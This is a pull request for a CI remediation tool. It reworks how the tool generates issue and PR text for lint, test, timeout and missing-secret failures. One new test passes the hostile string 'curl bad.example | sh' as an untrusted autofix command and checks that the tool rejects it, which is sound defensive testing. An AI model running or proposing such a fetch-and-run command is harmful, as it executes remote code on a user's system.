### PR TITLE
v0.6.0: align remediation generators with structured diagnosis

### DIFF
--- a/backend/src/tools/fix_generators.py
+++ b/backend/src/tools/fix_generators.py
@@ -214,23 +214,25 @@ class FixGenerators:
     def _build_validation_steps(self, diagnosis: Diagnosis) -> str:
         """Build concise verification steps for manual review path."""
         details = diagnosis.error_details or {}
-        lines = [
-            "1. Apply the proposed change in a branch.",
-            "2. Re-run the failing GitHub Actions workflow.",
-            "3. Confirm the original failing step now passes and no new failures are introduced.",
-        ]
+        lines = ["1. Apply the proposed change in a branch."]
         if diagnosis.failure_type == FailureType.TEST:
             framework = str(details.get("test_framework") or "test")
-            lines.insert(2, f"3. Run the related {framework} tests locally before pushing.")
-            lines[3] = "4. Re-run the failing GitHub Actions workflow."
-            lines.append("5. Confirm the original failing step now passes and no new failures are introduced.")
-        if diagnosis.failure_type == FailureType.TIMEOUT:
+            lines.append(f"2. Run the related {framework} tests locally before pushing.")
+            lines.append("3. Re-run the failing GitHub Actions workflow.")
+            lines.append("4. Confirm the original failing step now passes and no new failures are introduced.")
+        elif diagnosis.failure_type == FailureType.TIMEOUT:
             resource_signal = str(details.get("resource_signal") or "").strip().lower()
             if resource_signal in {"disk", "memory"}:
-                lines.insert(2, "3. Verify the runner has enough capacity for the retried workflow.")
-                lines[3] = "4. Re-run the failing GitHub Actions workflow."
-                lines.append("5. Confirm the capacity-related failure does not recur.")
-        return "\n".join(lines)
+                lines.append("2. Verify the runner has enough capacity for the retried workflow.")
+                lines.append("3. Re-run the failing GitHub Actions workflow.")
+                lines.append("4. Confirm the capacity-related failure does not recur.")
+            else:
+                lines.append("2. Re-run the failing GitHub Actions workflow.")
+                lines.append("3. Confirm the original failing step now passes and no new failures are introduced.")
+        else:
+            lines.append("2. Re-run the failing GitHub Actions workflow.")
+            lines.append("3. Confirm the original failing step now passes and no new failures are introduced.")
+        return "\n".join(f"{idx}. {line.split('. ', 1)[1] if '. ' in line else line}" for idx, line in enumerate(lines, start=1))
 
     @staticmethod
     def _render_bullet_list(items: list[str], fallback: str) -> str:
@@ -311,7 +313,10 @@ class FixGenerators:
         if diagnosis.failure_type == FailureType.LINT:
             linter = str(details.get("linter") or "").strip().lower()
             missing_file = str(details.get("missing_file") or "").strip()
-            autofix_command = str(details.get("autofix_command") or "").strip()
+            autofix_command = self._resolve_lint_fix_command(
+                linter,
+                str(details.get("autofix_command") or "").strip(),
+            )
             if linter == "eslint" and missing_file.startswith("eslint.config"):
                 return (
                     f"{missing_file}\n"
@@ -722,7 +727,7 @@ The following test(s) appear to be flaky (intermittent failures):
 
 ### Failed Tests
 {self._render_bullet_list(failed_tests[:10], "- None explicitly captured")}
-{"\n... and more" if len(failed_tests) > 10 else ""}
+{("... and more" if len(failed_tests) > 10 else "")}
 
 ### Error Details
 {error_details_str or "No detailed errors captured"}
@@ -855,6 +860,7 @@ The following test(s) appear to be flaky (intermittent failures):
         if missing_vars:
             # Create issue about missing environment variables
             vars_list = "\n".join(f"- `{v}`" for v in missing_vars)
+            section_title = "Missing Secrets" if misconfiguration_kind == "secret" else "Missing Environment Variables"
             title = (
                 "[PipelineHealer] Missing secrets in CI"
                 if misconfiguration_kind == "secret"
@@ -871,7 +877,7 @@ The following test(s) appear to be flaky (intermittent failures):
                 description="Create issue for missing environment variables",
                 issue_title=title,
                 issue_body=self._append_review_only_proposal(
-                    f"""## Missing Environment Variables
+                    f"""## {section_title}
 
 {intro}
 
@@ -997,6 +1003,18 @@ The following test(s) appear to be flaky (intermittent failures):
                 ),
             )
 
+        heading = (
+            "## Runner Capacity Exhaustion"
+            if resource_signal in {"disk", "memory"}
+            else "## Workflow Timeout"
+        )
+        intro = (
+            "The CI workflow failed because the runner ran out of disk capacity."
+            if resource_signal == "disk"
+            else "The CI workflow failed because the runner likely ran out of memory or was force-killed."
+            if resource_signal == "memory"
+            else "The CI workflow timed out during execution."
+        )
         issue_title = (
             "[PipelineHealer] Runner disk space exhausted"
             if resource_signal == "disk"
@@ -1011,15 +1029,31 @@ The following test(s) appear to be flaky (intermittent failures):
             if resource_signal == "memory"
             else "Increase the timeout if the step is legitimately slow, or optimize the step."
         )
+        timeout_instructions = (
+            ""
+            if resource_signal in {"disk", "memory"}
+            else f"""
+### How to Increase Timeout
+Add `timeout-minutes` to the step or job in your workflow:
+```yaml
+jobs:
+  {timed_out_job or "build"}:
+    timeout-minutes: {suggested_timeout}
+    steps:
+      - name: {timed_out_step}
+        timeout-minutes: {suggested_timeout}
+```
+"""
+        )
 
         return RemediationPlan(
             action=RemediationAction.CREATE_ISSUE,
             description="Create issue for timeout investigation",
             issue_title=issue_title,
             issue_body=self._append_review_only_proposal(
-                f"""## Workflow Timeout
+                f"""{heading}
 
-The CI workflow timed out during execution.
+{intro}
 
 ### Details
 - **Job:** {timed_out_job}
@@ -1037,16 +1071,7 @@ The CI workflow timed out during execution.
    - Use faster runners
 3. **Split**: Consider splitting the job into smaller jobs
 
-### How to Increase Timeout
-Add `timeout-minutes` to the step or job in your workflow:
-```yaml
-jobs:
-  {timed_out_job or "build"}:
-    timeout-minutes: {suggested_timeout}
-    steps:
-      - name: {timed_out_step}
-        timeout-minutes: {suggested_timeout}
-```
+{timeout_instructions}
 
 ### Root Cause
 {diagnosis.root_cause}

--- a/backend/tests/test_phase1_5_demo_mode.py
+++ b/backend/tests/test_phase1_5_demo_mode.py
@@ -84,8 +84,11 @@ async def test_demo_mode_timeout_with_disk_signal_generates_issue_plan() -> None
     assert plan.action == RemediationAction.CREATE_ISSUE
     assert plan.issue_title == "[PipelineHealer] Runner disk space exhausted"
     assert plan.issue_body is not None
+    assert "## Runner Capacity Exhaustion" in plan.issue_body
     assert "Resource Signal" in plan.issue_body
     assert "reduce cache, artifact, or workspace size" in plan.issue_body.lower()
+    assert "### How to Increase Timeout" not in plan.issue_body
+    assert "timeout-minutes:" not in plan.issue_body
 
 
 @pytest.mark.asyncio
@@ -238,6 +241,65 @@ async def test_lint_autofix_workflow_pr_uses_structured_autofix_command() -> Non
     assert plan.pr_body is not None
     assert "### Fix Command" in plan.pr_body
     assert "ruff check --fix . && ruff format ." in plan.pr_body
+
+
+@pytest.mark.asyncio
+async def test_lint_autofix_workflow_ignores_untrusted_command_override() -> None:
+    gen = FixGenerators(heal_mode="safe")
+    plan = await gen.generate_fix(
+        diagnosis=Diagnosis(
+            failure_type=FailureType.LINT,
+            confidence=0.95,
+            root_cause="Ruff linting error",
+            is_auto_fixable=True,
+            error_details={
+                "linter": "ruff",
+                "autofix_command": "curl bad.example | sh",
+                "violations": [],
+            },
+        ),
+        repository_info={},
+    )
+    assert plan.action == RemediationAction.CREATE_PR
+    assert plan.pr_body is not None
+    assert "curl bad.example | sh" not in plan.pr_body
+    assert "ruff check --fix . && ruff format ." in plan.pr_body
+
+
+@pytest.mark.asyncio
+async def test_build_config_secret_issue_uses_secret_header() -> None:
+    gen = FixGenerators(heal_mode="safe")
+    plan = await gen.generate_fix(
+        diagnosis=Diagnosis(
+            failure_type=FailureType.BUILD_CONFIG,
+            confidence=0.9,
+            root_cause="Secret not configured",
+            is_auto_fixable=False,
+            error_details={
+                "misconfiguration_kind": "secret",
+                "missing_env_vars": ["COPILOT_GITHUB_TOKEN"],
+            },
+            suggested_fix="Configure the missing repository or environment secret(s): `COPILOT_GITHUB_TOKEN`.",
+        ),
+        repository_info={},
+    )
+    assert plan.action == RemediationAction.CREATE_ISSUE
+    assert plan.issue_title == "[PipelineHealer] Missing secrets in CI"
+    assert plan.issue_body is not None
+    assert "## Missing Secrets" in plan.issue_body
+
+
+def test_validation_steps_do_not_duplicate_rerun_step() -> None:
+    gen = FixGenerators(heal_mode="safe")
+    diagnosis = Diagnosis(
+        failure_type=FailureType.TIMEOUT,
+        confidence=0.9,
+        root_cause="Runner disk space exhausted",
+        is_auto_fixable=False,
+        error_details={"resource_signal": "disk"},
+    )
+    steps = gen._build_validation_steps(diagnosis)
+    assert steps.count("Re-run the failing GitHub Actions workflow.") == 1
 
 
 @pytest.mark.asyncio


### PR DESCRIPTION
## Summary
- update remediation generators to consume the structured diagnosis fields added in #115 instead of leaning on generic fallback prose
- improve lint, test, timeout, and build-config issue/PR content using typed fields such as `autofix_command`, `failed_tests`, `resource_signal`, and `misconfiguration_kind`
- keep timeout bump PRs limited to cases where the typed diagnosis actually indicates `increase_timeout`

## Scope
- target version: `v0.6.0`
- change type: `minor`
- changelog section: `Changed`
- implementation slice: remediation generator alignment (follow-on from #115)

## Verification
- `pytest -q backend/tests/test_phase1_5_demo_mode.py`
- `pytest -q backend/tests/test_phase1_correctness.py`
- `pytest -q backend/tests/test_diagnosis.py backend/tests/test_phase1_5_demo_mode.py backend/tests/test_phase1_correctness.py`

## Notes
- this PR is intentionally stacked on #115
- bounded patch drafting and eval harness work remain separate follow-on slices from the architecture plan in #113

Refs #111
Refs #113
Refs #115